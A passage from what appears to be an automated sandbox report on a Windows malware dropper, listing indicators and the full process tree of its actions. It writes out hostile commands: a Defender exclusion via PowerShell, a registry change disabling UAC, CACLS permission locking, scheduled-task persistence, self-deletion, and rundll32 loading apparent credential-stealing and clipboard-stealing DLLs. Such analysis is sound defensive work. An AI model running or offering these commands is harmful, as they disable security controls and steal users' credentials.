53013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	h7jqt6NA7XhdK3quV4edRunn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	h7jqt6NA7XhdK3quV4edRunn.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe
3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe
3344	powershell.exe
3344	powershell.exe
4376	OHTfxwtBUjCjxOLnw6jIdlPm.exe
4376	OHTfxwtBUjCjxOLnw6jIdlPm.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
2952	powershell.exe
2952	powershell.exe
2952	powershell.exe
4836	Bj9PEARBYxBKa3JbLohwrrkI.tmp
4836	Bj9PEARBYxBKa3JbLohwrrkI.tmp
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe
Token: SeDebugPrivilege	1972	jsc.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeDebugPrivilege	3120	callcustomer.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	3216	JwDLqh5ZmMP4J1Rtni6vkHbk.exe
Token: SeDebugPrivilege	5108	DigitalPulseService.exe
Token: SeShutdownPrivilege	5996	powercfg.exe
Token: SeCreatePagefilePrivilege	5996	powercfg.exe
Token: SeShutdownPrivilege	6040	powercfg.exe
Token: SeCreatePagefilePrivilege	6040	powercfg.exe
Token: SeShutdownPrivilege	6100	powercfg.exe
Token: SeCreatePagefilePrivilege	6100	powercfg.exe
Token: SeShutdownPrivilege	3552	powercfg.exe
Token: SeCreatePagefilePrivilege	3552	powercfg.exe
Token: SeDebugPrivilege	5764	powershell.EXE
Token: SeDebugPrivilege	5836	calllcustomer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4836	Bj9PEARBYxBKa3JbLohwrrkI.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3696 wrote to memory of 3344	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	90
PID 3696 wrote to memory of 3344	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	90
PID 3696 wrote to memory of 3344	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	90
PID 3696 wrote to memory of 2460	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	93
PID 3696 wrote to memory of 2460	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	93
PID 3696 wrote to memory of 1972	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	92
PID 3696 wrote to memory of 1972	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	92
PID 3696 wrote to memory of 1972	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	92
PID 3696 wrote to memory of 1972	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	92
PID 3696 wrote to memory of 1972	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	92
PID 3696 wrote to memory of 1972	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	92
PID 3696 wrote to memory of 1972	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	92
PID 3696 wrote to memory of 1972	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	92
PID 1972 wrote to memory of 5112	1972	jsc.exe	94
PID 1972 wrote to memory of 5112	1972	jsc.exe	94
PID 1972 wrote to memory of 5112	1972	jsc.exe	94
PID 1972 wrote to memory of 2704	1972	jsc.exe	96
PID 1972 wrote to memory of 2704	1972	jsc.exe	96
PID 1972 wrote to memory of 2076	1972	jsc.exe	95
PID 1972 wrote to memory of 2076	1972	jsc.exe	95
PID 1972 wrote to memory of 4624	1972	jsc.exe	97
PID 1972 wrote to memory of 4624	1972	jsc.exe	97
PID 1972 wrote to memory of 4624	1972	jsc.exe	97
PID 5112 wrote to memory of 4188	5112	ajMmiEpKM5OqZdh1nhJPx2rj.exe	109
PID 5112 wrote to memory of 4188	5112	ajMmiEpKM5OqZdh1nhJPx2rj.exe	109
PID 5112 wrote to memory of 4188	5112	ajMmiEpKM5OqZdh1nhJPx2rj.exe	109
PID 1972 wrote to memory of 2204	1972	jsc.exe	98
PID 1972 wrote to memory of 2204	1972	jsc.exe	98
PID 1972 wrote to memory of 2204	1972	jsc.exe	98
PID 1972 wrote to memory of 3216	1972	jsc.exe	108
PID 1972 wrote to memory of 3216	1972	jsc.exe	108
PID 1972 wrote to memory of 3216	1972	jsc.exe	108
PID 2076 wrote to memory of 1280	2076	4spGpdCkGyZsyMiGix6d3PgZ.exe	99
PID 2076 wrote to memory of 1280	2076	4spGpdCkGyZsyMiGix6d3PgZ.exe	99
PID 1972 wrote to memory of 4472	1972	jsc.exe	101
PID 1972 wrote to memory of 4472	1972	jsc.exe	101
PID 1972 wrote to memory of 4472	1972	jsc.exe	101
PID 1280 wrote to memory of 3120	1280	callcustomerpro.exe	100
PID 1280 wrote to memory of 3120	1280	callcustomerpro.exe	100
PID 1280 wrote to memory of 3120	1280	callcustomerpro.exe	100
PID 1972 wrote to memory of 4376	1972	jsc.exe	106
PID 1972 wrote to memory of 4376	1972	jsc.exe	106
PID 1972 wrote to memory of 1824	1972	jsc.exe	102
PID 1972 wrote to memory of 1824	1972	jsc.exe	102
PID 1972 wrote to memory of 1824	1972	jsc.exe	102
PID 1972 wrote to memory of 1880	1972	jsc.exe	107
PID 1972 wrote to memory of 1880	1972	jsc.exe	107
PID 1972 wrote to memory of 1880	1972	jsc.exe	107
PID 1824 wrote to memory of 4076	1824	h7jqt6NA7XhdK3quV4edRunn.exe	103
PID 1824 wrote to memory of 4076	1824	h7jqt6NA7XhdK3quV4edRunn.exe	103
PID 1824 wrote to memory of 4076	1824	h7jqt6NA7XhdK3quV4edRunn.exe	103
PID 4188 wrote to memory of 4552	4188	nhdues.exe	104
PID 4188 wrote to memory of 4552	4188	nhdues.exe	104
PID 4188 wrote to memory of 4552	4188	nhdues.exe	104
PID 4188 wrote to memory of 2736	4188	nhdues.exe	113
PID 4188 wrote to memory of 2736	4188	nhdues.exe	113
PID 4188 wrote to memory of 2736	4188	nhdues.exe	113
PID 1880 wrote to memory of 4836	1880	Bj9PEARBYxBKa3JbLohwrrkI.exe	110
PID 1880 wrote to memory of 4836	1880	Bj9PEARBYxBKa3JbLohwrrkI.exe	110
PID 1880 wrote to memory of 4836	1880	Bj9PEARBYxBKa3JbLohwrrkI.exe	110
PID 1824 wrote to memory of 4360	1824	h7jqt6NA7XhdK3quV4edRunn.exe	111
PID 1824 wrote to memory of 4360	1824	h7jqt6NA7XhdK3quV4edRunn.exe	111
PID 1824 wrote to memory of 4360	1824	h7jqt6NA7XhdK3quV4edRunn.exe	111
PID 1824 wrote to memory of 4080	1824	h7jqt6NA7XhdK3quV4edRunn.exe	115

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3128
- C:\Users\Admin\AppData\Local\Temp\5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe
  "C:\Users\Admin\AppData\Local\Temp\5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe"
  2⤵
  - UAC bypass
  - Windows security bypass
  - Checks computer location settings
  - Windows security modification
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:3696
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe" -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3344
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    - Drops startup file
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1972
  - - C:\Users\Admin\Pictures\ajMmiEpKM5OqZdh1nhJPx2rj.exe
      "C:\Users\Admin\Pictures\ajMmiEpKM5OqZdh1nhJPx2rj.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:5112
    - - C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4188
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit
        6⤵
        
        PID:2736
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        7⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nhdues.exe" /P "Admin:N"
        7⤵
        
        PID:4880
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nhdues.exe" /P "Admin:R" /E
        7⤵
        
        PID:5236
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        7⤵
        
        PID:4812
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\1ff8bec27e" /P "Admin:N"
        7⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\1ff8bec27e" /P "Admin:R" /E
        7⤵
        
        PID:5752
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
        6⤵
        Loads dropped DLL
        
        PID:6116
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
        7⤵
        Loads dropped DLL
        
        PID:3748
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main
        6⤵
        Loads dropped DLL
        
        PID:5596
  - - C:\Users\Admin\Pictures\4spGpdCkGyZsyMiGix6d3PgZ.exe
      "C:\Users\Admin\Pictures\4spGpdCkGyZsyMiGix6d3PgZ.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:2076
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\callcustomerpro.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\callcustomerpro.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:1280
      - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callcustomer.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callcustomer.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:3120
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callcustomer.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callcustomer.exe
        7⤵
        Executes dropped EXE
        
        PID:6088
      - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\calllcustomer.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\calllcustomer.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5836
  - - C:\Users\Admin\Pictures\bTGe0ol3K0w3um7pskpHanHV.exe
      "C:\Users\Admin\Pictures\bTGe0ol3K0w3um7pskpHanHV.exe"
      4⤵
      Executes dropped EXE
      PID:2704
    - - C:\Users\Admin\AppData\Local\Temp\䔷湗瘸湣㝢穅㑣穆湆D
        
        "C:\Users\Admin\AppData\Local\Temp\䔷湗瘸湣㝢穅㑣穆湆D"
        5⤵
        Executes dropped EXE
        
        PID:3668
  - - C:\Users\Admin\Pictures\gEjNV46H1WJhZbR4oosHziet.exe
      "C:\Users\Admin\Pictures\gEjNV46H1WJhZbR4oosHziet.exe"
      4⤵
      Executes dropped EXE
      PID:4624
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:712
    - - C:\Users\Admin\Pictures\gEjNV46H1WJhZbR4oosHziet.exe
        
        "C:\Users\Admin\Pictures\gEjNV46H1WJhZbR4oosHziet.exe"
        5⤵
        
        PID:3892
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 624
        5⤵
        Program crash
        
        PID:2656
  - - C:\Users\Admin\Pictures\0cWv8tEmnjqxIuo0CxEGJazK.exe
      "C:\Users\Admin\Pictures\0cWv8tEmnjqxIuo0CxEGJazK.exe"
      4⤵
      Executes dropped EXE
      PID:2204
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:2096
    - - C:\Users\Admin\Pictures\0cWv8tEmnjqxIuo0CxEGJazK.exe
        
        "C:\Users\Admin\Pictures\0cWv8tEmnjqxIuo0CxEGJazK.exe"
        5⤵
        
        PID:1408
  - - C:\Users\Admin\Pictures\HmT0NNXHZoHsOEX0qCOYE4NB.exe
      "C:\Users\Admin\Pictures\HmT0NNXHZoHsOEX0qCOYE4NB.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      PID:4472
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\HmT0NNXHZoHsOEX0qCOYE4NB.exe" & exit
        5⤵
        
        PID:5508
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        6⤵
        Delays execution with timeout.exe
        
        PID:856
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 2060
        5⤵
        Program crash
        
        PID:5784
  - - C:\Users\Admin\Pictures\h7jqt6NA7XhdK3quV4edRunn.exe
      "C:\Users\Admin\Pictures\h7jqt6NA7XhdK3quV4edRunn.exe" --silent --allusers=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Modifies system certificate store
      Suspicious use of WriteProcessMemory
      PID:1824
    - - C:\Users\Admin\Pictures\h7jqt6NA7XhdK3quV4edRunn.exe
        
        C:\Users\Admin\Pictures\h7jqt6NA7XhdK3quV4edRunn.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.26 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6f4e8538,0x6f4e8548,0x6f4e8554
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4076
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\h7jqt6NA7XhdK3quV4edRunn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\h7jqt6NA7XhdK3quV4edRunn.exe" --version
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4360
    - - C:\Users\Admin\Pictures\h7jqt6NA7XhdK3quV4edRunn.exe
        
        "C:\Users\Admin\Pictures\h7jqt6NA7XhdK3quV4edRunn.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1824 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231011085458" --session-guid=10b7fadb-0649-4462-a011-07979de50b03 --server-tracking-blob=MWZkODFiYjU3ZDRjZGNkNGExNDM0OWZjZjE2M2EwYzg1NTU0YzY3N2JhM2RhNmZkNjM5MmI5ZWI1MzQ4OGRhYzp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NzAxNDQ4MC45MjgxIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI4ZDViN2Q0Zi1hMmE0LTQzNzUtODg1My05NThlNjRiYWI2NTIifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1005000000000000
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        
        PID:4080
      - C:\Users\Admin\Pictures\h7jqt6NA7XhdK3quV4edRunn.exe
        
        C:\Users\Admin\Pictures\h7jqt6NA7XhdK3quV4edRunn.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.26 --initial-client-data=0x2e0,0x2f0,0x2f4,0x2bc,0x2f8,0x6e148538,0x6e148548,0x6e148554
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4292
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310110854581\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310110854581\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
        5⤵
        
        PID:4324
  - - C:\Users\Admin\Pictures\OHTfxwtBUjCjxOLnw6jIdlPm.exe
      "C:\Users\Admin\Pictures\OHTfxwtBUjCjxOLnw6jIdlPm.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in Drivers directory
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      PID:4376
  - - C:\Users\Admin\Pictures\Bj9PEARBYxBKa3JbLohwrrkI.exe
      "C:\Users\Admin\Pictures\Bj9PEARBYxBKa3JbLohwrrkI.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1880
    - - C:\Users\Admin\AppData\Local\Temp\is-K27MI.tmp\Bj9PEARBYxBKa3JbLohwrrkI.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-K27MI.tmp\Bj9PEARBYxBKa3JbLohwrrkI.tmp" /SL5="$100170,5025136,832512,C:\Users\Admin\Pictures\Bj9PEARBYxBKa3JbLohwrrkI.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:4836
      - C:\Users\Admin\AppData\Local\Temp\is-O42CU.tmp\_isetup\_setup64.tmp
        
        helper 105 0x428
        6⤵
        Executes dropped EXE
        
        PID:3104
      - C:\Windows\system32\schtasks.exe
        
        "schtasks" /Query /TN "DigitalPulseUpdateTask"
        6⤵
        
        PID:3256
      - C:\Windows\system32\schtasks.exe
        
        "schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:5428
      - C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe
        
        "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5108
  - - C:\Users\Admin\Pictures\JwDLqh5ZmMP4J1Rtni6vkHbk.exe
      "C:\Users\Admin\Pictures\JwDLqh5ZmMP4J1Rtni6vkHbk.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3216
  - - C:\Users\Admin\Pictures\6OHN4CyGcKVkwjvgqcvJp9Oo.exe
      "C:\Users\Admin\Pictures\6OHN4CyGcKVkwjvgqcvJp9Oo.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Checks whether UAC is enabled
      Drops file in System32 directory
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:3844
  - - C:\Users\Admin\Pictures\CyHfsVAUgPHl3A20x2ColQBi.exe
      "C:\Users\Admin\Pictures\CyHfsVAUgPHl3A20x2ColQBi.exe"
      4⤵
      Executes dropped EXE
      PID:4956
    - - C:\Users\Admin\AppData\Local\Temp\7zS9CC8.tmp\Install.exe
        
        .\Install.exe
        5⤵
        Executes dropped EXE
        
        PID:1820
      - C:\Users\Admin\AppData\Local\Temp\7zSB5CE.tmp\Install.exe
        
        .\Install.exe /WxXrddidpK "385121" /S
        6⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:3536
        
        C:\Windows\SysWOW64\forfiles.exe
        
